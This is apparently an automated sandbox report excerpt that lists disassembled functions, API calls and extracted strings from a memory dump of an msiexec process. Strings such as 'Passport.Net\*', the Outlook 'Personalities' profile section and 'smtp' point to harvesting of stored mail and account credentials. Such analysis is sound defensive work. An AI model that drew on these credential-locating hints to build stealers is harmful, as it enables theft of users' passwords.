                        • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                        • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F7AE
                      • strlen.MSVCRT ref: 0040F7BE
                      • _mbscpy.MSVCRT(00000000,?,?,00000000), ref: 0040F7CF
                      • LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F7DC
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: AddressProc$LibraryLoad_mbscpy$ByteCharFreeLocalMultiWidestrlen
                      • String ID: Passport.Net\*
                      • API String ID: 2329438634-3671122194
                      • Opcode ID: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                      • Instruction ID: cbd5109d0b46f6ae46d16b49076c688dceaf9cc559dd015bf255ce3d8649dee3
                      • Opcode Fuzzy Hash: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                      • Instruction Fuzzy Hash: 98316F76900109ABDB10EFA6DD45DAEB7B9EF89300F10007BE605F7291DB389A04CB59
                      APIs
                        • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                      • memset.MSVCRT ref: 0040330B
                      • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                      • strchr.MSVCRT ref: 0040335A
                        • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                      • strlen.MSVCRT ref: 0040339C
                        • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                      • String ID: Personalities
                      • API String ID: 2103853322-4287407858
                      • Opcode ID: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                      • Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
                      • Opcode Fuzzy Hash: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                      • Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memset
                      • String ID: H
                      • API String ID: 2221118986-2852464175
                      • Opcode ID: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                      • Instruction ID: 41a1901620add3bbd0c629c105807ca0f7ae5b253a5bd6696a221ab72d79fc9a
                      • Opcode Fuzzy Hash: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                      • Instruction Fuzzy Hash: C0916C75D00219DFDF24DFA5D881AEEB7B5FF48300F10849AE959AB201E734AA45CF98
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memcpy
                      • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                      • API String ID: 3510742995-3170954634
                      • Opcode ID: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                      • Instruction ID: e987c9c84479fff69dc62f11a90029b17cbd8b5ab9a96ddea988199e68ce63eb
                      • Opcode Fuzzy Hash: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                      • Instruction Fuzzy Hash: 2361C235B006259FCB04DF68E484BAEFBF1BF44314F55809AE904AB352D738E980CB98
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memcpy$memset
                      • String ID: winWrite1$winWrite2
                      • API String ID: 438689982-3457389245
                      • Opcode ID: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                      • Instruction ID: c2532708ffcca3880dfc28061b61c902a2330187b6102c2a8a28e688d44e82e0
                      • Opcode Fuzzy Hash: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                      • Instruction Fuzzy Hash: 86418072A00209EBDF00DF95CC85BDE7775FF85315F14411AE924A7280D778EAA4CB99
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memcpymemset
                      • String ID: winRead
                      • API String ID: 1297977491-2759563040
                      • Opcode ID: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                      • Instruction ID: 3ec02e552038d814b148e8dc6d2e6fcfdb14063e9eab1ef980803e4d567ed084
                      • Opcode Fuzzy Hash: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                      • Instruction Fuzzy Hash: DC31C372A00218ABDF10DF69CC46ADF776AEF84314F184026FE14DB241D334EE948BA9
                      APIs
                      • memset.MSVCRT ref: 0044955B
                      • memset.MSVCRT ref: 0044956B
                      • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                      • memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memcpymemset
                      • String ID: gj
                      • API String ID: 1297977491-4203073231
                      • Opcode ID: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                      • Instruction ID: 902d5c3a1247e7abcff0c4a84da7d54d3a467651d8a5431b25503c8ae0e770b6
                      • Opcode Fuzzy Hash: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                      • Instruction Fuzzy Hash: AF216A733443402BF7259A3ACC41B5B775DDFCA318F16041EF68A8B342E67AEA058715
                      APIs
                      • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                      • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                      • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                      • OpenClipboard.USER32(?), ref: 0040C1B1
                      • GetLastError.KERNEL32 ref: 0040C1CA
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: Temp$ClipboardDirectoryErrorFileLastNameOpenPathWindows
                      • String ID:
                      • API String ID: 1189762176-0
                      • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                      • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                      • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                      • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                      APIs
                      • GetParent.USER32(?), ref: 004090C2
                      • GetWindowRect.USER32(?,?), ref: 004090CF
                      • GetClientRect.USER32(00000000,?), ref: 004090DA
                      • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                      • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: Window$Rect$ClientParentPoints
                      • String ID:
                      • API String ID: 4247780290-0
                      • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                      • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                      • Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                      • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                      APIs
                        • Part of subcall function 00407107: memset.MSVCRT ref: 00407127
                        • Part of subcall function 00407107: GetClassNameA.USER32(?,00000000,000000FF), ref: 0040713A
                        • Part of subcall function 00407107: _strcmpi.MSVCRT ref: 0040714C
                      • SetBkMode.GDI32(?,00000001), ref: 0041079E
                      • GetSysColor.USER32(00000005), ref: 004107A6
                      • SetBkColor.GDI32(?,00000000), ref: 004107B0
                      • SetTextColor.GDI32(?,00C00000), ref: 004107BE
                      • GetSysColorBrush.USER32(00000005), ref: 004107C6
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: Color$BrushClassModeNameText_strcmpimemset
                      • String ID:
                      • API String ID: 2775283111-0
                      • Opcode ID: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                      • Instruction ID: 687cb18978465a3feaaa07aa3b8de37e8775815fe2b8de28c5581ef0bdca0d30
                      • Opcode Fuzzy Hash: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                      • Instruction Fuzzy Hash: AAF03135101109BBCF112FA5DC49ADE3F25EF05711F14812AFA25A85F1CBB5A990DF58
                      APIs
                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004147CE
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                      • String ID: winSeekFile$winTruncate1$winTruncate2
                      • API String ID: 885266447-2471937615
                      • Opcode ID: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                      • Instruction ID: 76c2d8f9c45a6ab14154b13c081d04d7f34c1e3f6c53ca943db3ce1179081271
                      • Opcode Fuzzy Hash: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                      • Instruction Fuzzy Hash: 5C313175600700AFE720AF65CC41EABB7E8FB88715F104A2EF965932D1D734E8808B29
                      APIs
                      • _strcmpi.MSVCRT ref: 0040E134
                      • _strcmpi.MSVCRT ref: 0040E14D
                      • _mbscpy.MSVCRT(?,smtp,0040DE7F,0040DE7F,?,?,00000000,000000FF), ref: 0040E19A
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: _strcmpi$_mbscpy
                      • String ID: smtp
                      • API String ID: 2625860049-60245459
                      • Opcode ID: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                      • Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
                      • Opcode Fuzzy Hash: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                      • Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
                      APIs
                      • memset.MSVCRT ref: 0040C28C
                      • SetFocus.USER32(?,?), ref: 0040C314
                        • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: FocusMessagePostmemset
                      • String ID: S_@$l
                      • API String ID: 3436799508-4018740455
                      • Opcode ID: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                      • Instruction ID: f4172cee4733ded4edf5c13384372fb960b3a31eee454cf66b40e3553cb76095
                      • Opcode Fuzzy Hash: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                      • Instruction Fuzzy Hash: 1411A172900158CBDF219B14CD457DE7BB9AF81308F0800F5E94C7B296C7B45A89CFA9
                      APIs
                      • memset.MSVCRT ref: 004092C0
                      • GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                      • _mbscpy.MSVCRT(?,?), ref: 004092FC
                      Strings
                      • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 004092A9
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: PrivateProfileString_mbscpymemset
                      • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>
                      • API String ID: 408644273-3424043681
                      • Opcode ID: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                      • Instruction ID: a8dcbc571cfa5336c44be942190f1d9429afcf202dd246abef1f156f809eb6de
                      • Opcode Fuzzy Hash: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                      • Instruction Fuzzy Hash: 02F0E0725011A83AEB1297549C02FCA779CCB0D307F1440A2B749E20C1D5F8DEC44A9D
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: _mbscpy
                      • String ID: C^@$X$ini
                      • API String ID: 714388716-917056472
                      • Opcode ID: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                      • Instruction ID: 848b4a5d233ab05c703a0d630411b91f0640a461eb42b4d170138ac17b774cf5
                      • Opcode Fuzzy Hash: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                      • Instruction Fuzzy Hash: F601B2B1D002489FDB50DFE9D9856CEBFF4AB08318F10802AE415F6240EB7895458F59
                      APIs
                        • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                        • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,?,?,00000000,0000003C,?,?,00401018,MS Sans Serif,0000000A,00000001), ref: 00407011
                      • CreateFontIndirectA.GDI32(?), ref: 0040101F
                      • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                      • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                      • String ID: MS Sans Serif
                      • API String ID: 3492281209-168460110
                      • Opcode ID: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                      • Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
                      • Opcode Fuzzy Hash: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                      • Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: ClassName_strcmpimemset
                      • String ID: edit
                      • API String ID: 275601554-2167791130
                      • Opcode ID: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                      • Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
                      • Opcode Fuzzy Hash: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                      • Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: strlen$_mbscat
                      • String ID: 3CD
                      • API String ID: 3951308622-1938365332
                      • Opcode ID: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                      • Instruction ID: 1107c6f19d6a4433d5fdc1d3c5cfb72f3531f1d81a70b052f8a244d3c085287a
                      • Opcode Fuzzy Hash: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                      • Instruction Fuzzy Hash: 1BD0A77390C2603AE61566167C42F8E5BC1CFD433AB15081FF408D1281DA3DE881809D
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memset
                      • String ID: rows deleted
                      • API String ID: 2221118986-571615504
                      • Opcode ID: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                      • Instruction ID: 17dfb349c3cd8fc2c2490db290532cf881f14abfa8d6012d9aa572d9710d7201
                      • Opcode Fuzzy Hash: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                      • Instruction Fuzzy Hash: D5028171E00218AFDF14DFA5D981AEEBBB5FF08314F14005AF914B7291D7B9AA41CBA4
                      APIs
                        • Part of subcall function 004073B3: memset.MSVCRT ref: 004073C1
                      • ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                      • ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                      • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                      • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                      • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: ??2@$memset
                      • String ID:
                      • API String ID: 1860491036-0
                      • Opcode ID: fb665ac2fefbd88b77538ab471de92cac26eee1f38b4faef847c6b5bb8c147a3
                      • Instruction ID: bd2fcbe50e3d5b8ec1466eca70e60fda3411ba7e10a355e4f398212a99dd52d4
                      • Opcode Fuzzy Hash: fb665ac2fefbd88b77538ab471de92cac26eee1f38b4faef847c6b5bb8c147a3
                      • Instruction Fuzzy Hash: 973162B09107508FE751DF3A8845A16FBE4FF80B05F25486FD549CB2A2E779E5408B19
                      APIs
                      • memset.MSVCRT ref: 004048C2
                      • memset.MSVCRT ref: 004048D6
                      • memset.MSVCRT ref: 004048EA
                      • memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                      • memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memset$memcpy
                      • String ID:
                      • API String ID: 368790112-0
                      • Opcode ID: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                      • Instruction ID: 0e4d5a8aef3e538851842ff93af65fc880b0f2046ec3e537946e92548d274f73
                      • Opcode Fuzzy Hash: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                      • Instruction Fuzzy Hash: BB2162B650115DABDF11EE68CD41EDE77ACDF95304F0040A6B708E3151D2749F448B64
                      APIs
                      • memset.MSVCRT ref: 0040D2C2
                      • memset.MSVCRT ref: 0040D2D8
                      • memset.MSVCRT ref: 0040D2EA
                      • memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                      • memset.MSVCRT ref: 0040D319
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memset$memcpy
                      • String ID:
                      • API String ID: 368790112-0
                      • Opcode ID: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                      • Instruction ID: 358c417c53aa398974aae77e4359fd90ac0a4dba5340dfd55ca125e4bb0c9b0b
                      • Opcode Fuzzy Hash: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                      • Instruction Fuzzy Hash: 8E01D8B5A40B406BE235AE25CC03F2AB3A8DF91714F400A2EF692676C1D7B8F509915D
                      APIs
                      • __allrem.LIBCMT ref: 00425850
                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00425885
                      • __allrem.LIBCMT ref: 00425933
                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042597B
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                      • String ID:
                      • API String ID: 1992179935-0
                      • Opcode ID: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                      • Instruction ID: 2fc5b562d87482ee0bf7138f77baf3e4365ffd42061eb2d4d5abd72185a9e376
                      • Opcode Fuzzy Hash: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                      • Instruction Fuzzy Hash: C96180B1A00A29DFCF149B64D840AAEB7B1FF45320F68815AE548AB391D7389D81CF19
                      APIs
                      Strings
                      • variable number must be between ?1 and ?%d, xrefs: 0042C5C2
                      • too many SQL variables, xrefs: 0042C6FD
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memset
                      • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                      • API String ID: 2221118986-515162456
                      • Opcode ID: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                      • Instruction ID: 69d39437184f158b69242413db2932325e78deb4f0df02558d14bae7a1bb2b74
                      • Opcode Fuzzy Hash: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                      • Instruction Fuzzy Hash: 93518B31B00626EFDB29DF68D481BEEB7A4FF09304F50016BE811A7251D779AD51CB88
                      APIs
                        • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026E4
                      • memset.MSVCRT ref: 004026AD
                        • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                        • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                        • Part of subcall function 004108E5: memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                        • Part of subcall function 004108E5: CoTaskMemFree.COMBASE(00000000), ref: 00410970
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040279C
                      • LocalFree.KERNEL32(?), ref: 004027A6
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: ByteCharFreeFromMultiStringUuidWide$LocalQueryTaskValuememcpymemset
                      • String ID:
                      • API String ID: 3503910906-0
                      • Opcode ID: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                      • Instruction ID: aa14e43d8b473801bf9d2631992dc1640396fa6537153de3cc175e43cdbeb3f4
                      • Opcode Fuzzy Hash: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                      • Instruction Fuzzy Hash: 0B4183B1408384BFD711DB60CD85AAB77D8AF89314F044A3FF998A31C1D679DA44CB5A
                      APIs
                      • memset.MSVCRT ref: 0040C922
                      • SendMessageA.USER32(00000000,00000423,00000000,00000000), ref: 0040C966
                      • GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040C980
                      • PostMessageA.USER32(?,00000402,00000000,00000000), ref: 0040CA23
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: Message$MenuPostSendStringmemset
                      • String ID:
                      • API String ID: 3798638045-0
                      • Opcode ID: baefdefab252ba5ebdbc5dbfb72098888a57285fb2abb1b9f47d437d3554fda2
                      • Instruction ID: 1bc0f942f430aed347c7303033341c470b8779a554354b53929018aa447f6f2a
                      • Opcode Fuzzy Hash: baefdefab252ba5ebdbc5dbfb72098888a57285fb2abb1b9f47d437d3554fda2
                      • Instruction Fuzzy Hash: A241D071600215EBCB24CF24C8C5B97B7A4BF05325F1483B6E958AB2D2C3789D81CBD8
                      APIs
                        • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00409E0E
                        • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00409ED5
                      • strlen.MSVCRT ref: 0040B60B
                      • atoi.MSVCRT(?), ref: 0040B619
                      • _mbsicmp.MSVCRT ref: 0040B66C
                      • _mbsicmp.MSVCRT ref: 0040B67F
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
